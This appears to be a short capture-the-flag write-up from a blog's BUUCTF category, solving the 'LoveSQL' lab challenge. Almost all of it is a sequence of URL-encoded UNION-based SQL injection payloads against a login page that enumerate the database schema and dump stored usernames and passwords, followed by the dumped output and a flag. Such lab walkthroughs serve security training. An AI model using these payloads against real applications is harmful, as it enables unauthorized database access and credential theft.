view-source:http://5898ede5-0e9d-4e2f-8e19-add666f984c1.node3.buuoj.cn/check.php?username=%27+union+select+1,group_concat(schema_name),3%20from%20information_schema.schemata%23&password=guest

 

schema_name = geek

 

view-source:http://5898ede5-0e9d-4e2f-8e19-add666f984c1.node3.buuoj.cn/check.php?username=%27+union+select+1,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27geek%27%23&password=guest

 

table_name = geekuser, l0ve1ysq1

 

view-source:http://5898ede5-0e9d-4e2f-8e19-add666f984c1.node3.buuoj.cn/check.php?username=%27+union+select+1,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_name=%27l0ve1ysq1%27%23&password=guest

 

[l0ve1ysql] column name = id,username,password

 

view-source:http://5898ede5-0e9d-4e2f-8e19-add666f984c1.node3.buuoj.cn/check.php?username=%27+union+select+1,group_concat(concat(id,%27-%27,username,%27-%27,password)),3%20from%20l0ve1ysq1%23&password=guest

 

Hello 1-cl4y-wo_tai_nan_le,2-glzjin-glzjin_wants_a_girlfriend,3-Z4cHAr7zCr-biao_ge_dddd_hm,4-0xC4m3l-linux_chuang_shi_ren,5-Ayrain-a_rua_rain,6-Akko-yan_shi_fu_de_mao_bo_he,7-fouc5-cl4y,8-fouc5-di_2_kuai_fu_ji,9-fouc5-di_3_kuai_fu_ji,10-fouc5-di_4_kuai_fu_ji,11-fouc5-di_5_kuai_fu_ji,12-fouc5-di_6_kuai_fu_ji,13-fouc5-di_7_kuai_fu_ji,14-fouc5-di_8_kuai_fu_ji,15-leixiao-Syc_san_da_hacker,16-flag-flag{bd[redacted]c5}!

 

 

'Web > BUUCTF' 카테고리의 다른 글

[BUUCTF] - [BUUCTF 2018]Online Tool  (0) 2020.02.28
[BUUCTF] - [ZJCTF 2019]NiZhuanSiWei1  (0) 2020.02.26
[BUUCTF] - [极客大挑战 2019]LoveSQL1  (0) 2020.02.26
[BUUCTF] - [极客大挑战 2019]PHP1  (0) 2020.02.26
[BUUCTF] - [0CTF 2016]piapiapia1  (0) 2020.02.21
[BUUCTF] - [RoarCTF 2019]Easy Java1  (0) 2020.02.18

+ Recent posts